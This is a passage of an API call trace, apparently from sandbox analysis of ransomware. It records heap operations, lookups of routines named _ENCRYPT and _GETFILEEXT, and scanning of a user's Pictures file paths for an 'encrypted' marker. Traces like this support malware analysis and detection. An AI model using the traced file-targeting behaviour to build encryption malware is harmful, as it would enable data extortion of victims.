lpMsg=0x6aedfc) returned 0 [0039.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0039.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0039.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0039.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0039.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0039.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0039.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0039.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0039.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0039.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0039.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0039.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0039.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0039.997] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0039.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0039.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0039.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0039.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0039.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0039.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.998] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccd0 [0039.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ccd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0039.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0039.998] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0039.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0039.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0039.998] CloseHandle (hObject=0x128) returned 1 [0039.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0039.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0039.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0039.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.999] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0039.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0039.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0039.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0039.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0039.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0039.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0039.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0039.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.999] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.999] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0039.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0039.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0039.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.000] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.000] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0040.000] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.000] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0040.000] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0040.000] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.000] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.000] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.000] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.000] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.000] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.000] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.000] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadd4fc30, ftCreationTime.dwHighDateTime=0x1d5bef1, ftLastAccessTime.dwLowDateTime=0x2ece4750, ftLastAccessTime.dwHighDateTime=0x1d5bbab, ftLastWriteTime.dwLowDateTime=0x2ece4750, ftLastWriteTime.dwHighDateTime=0x1d5bbab, nFileSizeHigh=0x0, nFileSizeLow=0xfbf7, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Uruf9aJfh14ZE.gif", cAlternateFileName="URUF9A~1.GIF")) returned 0x7c20c0 [0040.000] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.000] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.000] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadd4fc30, ftCreationTime.dwHighDateTime=0x1d5bef1, ftLastAccessTime.dwLowDateTime=0x2ece4750, ftLastAccessTime.dwHighDateTime=0x1d5bbab, ftLastWriteTime.dwLowDateTime=0x2ece4750, ftLastWriteTime.dwHighDateTime=0x1d5bbab, nFileSizeHigh=0x0, nFileSizeLow=0xfbf7, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Uruf9aJfh14ZE.gif", cAlternateFileName="URUF9A~1.GIF")) returned 0x7c20c0 [0040.001] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.001] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ci\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 